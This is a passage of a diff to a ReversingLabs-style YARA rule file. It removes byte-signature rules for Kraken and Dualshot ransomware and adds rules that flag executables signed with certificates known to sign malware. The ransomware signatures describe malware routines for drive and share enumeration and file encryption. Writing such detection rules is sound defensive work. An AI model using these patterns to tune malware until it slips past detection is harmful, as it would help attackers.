-            [0-10] E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ??
-            FF (35 | 75) [1-4] FF 75 ?? (E8 | FF 15)
-            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? [1-10] FF (35 | 75) [1-4] 6A ??
-            6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) ??
-            ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
-            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8
-            ?? 75 ?? [10-40] FF (35 | 75) [1-4] FF 75 ??
-            (E8 |FF 15)
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "6b:72:ca:36:7d:40:fb:ef:16:e7:3e:6e:ba:6a:9a:59" and 1476748800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "1991779a-8b5d-5188-8a36-c8451923e88f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13458-L13474"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "44e86319106a4bf8edba6c1be2f90d68b3d1ef4591f0cc23921a0dc4da4a407b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $read_config_file and $file_type_loop and $encrypt_routine ) or ( $enum_drives and $enum_shared_resources and $find_files and $encrypt_files ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Net Technology" and pe.signatures [ i ] . serial == "73:6b:76:63:d3:22:53:34:13:f3:6e:3e:7e:55:f9:20" and 1159488000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Kraken : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Kraken ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7c302c2e-6ffc-5f51-90f4-c4ebd6c1c28b"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "d012df1d-5e85-57b4-8a79-5da91369a14a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Kraken.yara#L1-L151"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13476-L13492"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4a3867aba4dbdce5d008331a3058f57b00db246975fc4d77b79ab49d5f0bbb15"
+		logic_hash = "ddae18d566fa2fd077f51d0afff74fb8a8e525f88f23908c7402a4b2c092ad24"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Kraken"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_volumes = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? 00 A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 50 45 4C 00 C7 45
-            FC 00 00 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
-            8A 06 84 C0 0F 84 ?? ?? ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8B D4
-            C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 83 7A ?? ?? 72 ?? 8B 02 EB ?? 8B C2 C6 00
-            ?? 80 3E ?? 75 ?? 33 C9 EB ?? 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 51 56 8B CA
-            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 C6 ?? E9 ?? ?? ?? ?? BA ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ??
-            ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 68 ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8
-            ?? ?? ?? ?? 8B E5 5D C3 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
-        }
-		$enum_shares_p1 = {
-            50 56 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
-            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 66 0F 1F 44 00 ?? FF 75 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 56 8D 45 ?? 89 75 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 33 FF 0F 1F 40 ?? 3B 7D ?? 0F 83 ?? ?? ?? ?? 8B C7 C1 E0 ??
-            03 F0 F7 46 ?? ?? ?? ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 06 83 C4 ?? 8B C8 0F 11
-            00 0F 10 46 ?? 0F 11 40 ?? E8 ?? ?? ?? ?? 8B 75 ?? B3 ?? 47 EB ?? F7 46 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 8B 56 ?? 85 D2 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 71 ?? 8A 01 41 84 C0 75
-            ?? 2B CE 51 52 8D 4D ?? E8 ?? ?? ?? ?? 51 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
-            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B
-        }
-		$enum_shares_p2 = {
-            4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8
-            ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 55 ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 55 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ??
-            C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6
-            C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ??
-            E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
-            ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ??
-            8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ??
-            E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B
-            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
-            8B 75 ?? B3 ?? 47 E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 E9 ?? ??
-            ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ??
-            ?? ?? ?? C3
-        }
-		$find_files = {
-              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
-              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D 4D ??
-              C6 45 ?? ?? 8B 75 ?? 83 FE ?? 8B 7D ?? 8B 55 ?? 0F 43 CF 6A ?? 68 ?? ?? ?? ?? E8 ??
-              ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 CF 68 ?? ??
-              ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43
-              CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ??
-              6A ?? 0F 43 CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57
-              C0 C7 45 ?? ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-              45 ?? ?? ?? ?? ?? 83 FE ?? C6 45 ?? ?? 8D 4D ?? 0F 43 CF E8 ?? ?? ?? ?? 8B F0 89 75
-              ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B D6 50 8B CE E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ??
-              85 DB 0F 84 ?? ?? ?? ?? 8D 7B ?? B9 ?? ?? ?? ?? 8B C7 66 0F 1F 44 00 ?? 8A 10 3A 11
-              75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 F6 EB ??
-              1B F6 83 CE ?? B9 ?? ?? ?? ?? 8B C7 0F 1F 40 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
-              ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 3B F0 8B
-              75 ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 57 3D ?? ?? ?? ??
-              75 ?? E8 ?? ?? ?? ?? 50 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC
-              ?? C6 45 ?? ?? 8B CC 8B D0 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
-              ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-              83 EC ?? C6 45 ?? ?? 8B CC 8D 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4
-              ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
-              83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ??
-              ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-              C4 ?? B8 ?? ?? ?? ?? C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ??
-              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
-              E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
-              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 C6 45 ??
-              ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7
-              41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 45 ?? 6A ??
-              50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41
-              ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00
-              ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D
-              4D ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 7D ?? 0F 43 05 ?? ?? ?? ?? 83 FF ?? FF
-              35 ?? ?? ?? ?? 8B 75 ?? 0F 43 CE 8B 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
-              ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
-              C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-              83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8
-              ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8
-        }
-		$encrypt_files_p2 = {
-              84 C0 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ??
-              ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45
-              ?? 6A ?? 0F 43 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B
-              D8 83 FB ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 68 ??
-              ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 1B D7 01 05
-              ?? ?? ?? ?? 11 15 ?? ?? ?? ?? 83 65 ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 8B FA
-              8B F0 8B 55 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 6A ?? 1B D7 01 05 ?? ?? ?? ??
-              8B 45 ?? 11 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 6A ?? 83 15 ?? ?? ?? ?? ?? 6A ?? 53 FF
-              15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 FF 75 ?? FF 35 ?? ??
-              ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 53 1B D7 01 05 ?? ?? ?? ?? 11 15
-              ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 51 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 83
-              79 ?? ?? 72 ?? 8B 09 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D
-              ?? E8 ?? ?? ?? ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ??
-              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
-              64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_volumes and $find_files and ( all of ( $enum_shares_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "54:a1:70:10:24:61:fd:c9:67:ac:fa:fe:4b:bb:c7:f0" and 1476748800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dualshot : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dualshot ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "17828c85-0f1b-581b-842a-24e6f26e0b4d"
-		date = "2020-11-20"
-		modified = "2020-11-20"
+		id = "9ec73230-10cd-55ad-9ef7-56a875294cab"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Dualshot.yara#L1-L112"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13494-L13510"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a401369357901f42ad83227b025d3b14b3acd1f50705da82afbe8e4f85501919"
+		logic_hash = "dca37fda83650979566fb6ffbedaf713955a3c7f03ecc62e2e155475b7ca00e4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dualshot"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$internal_encrypt_file = {
-            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 02 28 ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? 03 28
-            ?? ?? ?? ?? 0D 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 09 16 09 8E 69 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 02 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ??
-            ?? 02 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 00 02 28 ?? ?? ?? ?? DE ?? 26
-            DE ?? 2A
-        }
-		$encrypt_files_p1 = {
-            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
-            8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13
-            ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ??
-            17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 1F ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ??
-            ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 11 ??
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ??
-            26 DE ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 11 ??
-            A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 2C ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
-            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 11 ??
-            72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files_p2 = {
-            02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 17 9A 28 ?? ?? ?? ?? 13 ?? 02
-            18 9A 28 ?? ?? ?? ?? 2C ?? 02 18 9A 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 02 18 9A 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 18
-            9A 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 2A 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 18 8D ?? ??
-            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 00
-            1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 08 20 ?? ?? ??
-            ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
-            25 1A 11 ?? 08 11 ?? 8E 69 6F ?? ?? ?? ?? 9A A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 11 ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
-            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11
-            ?? 1F ?? 3F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 17
-            6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2A
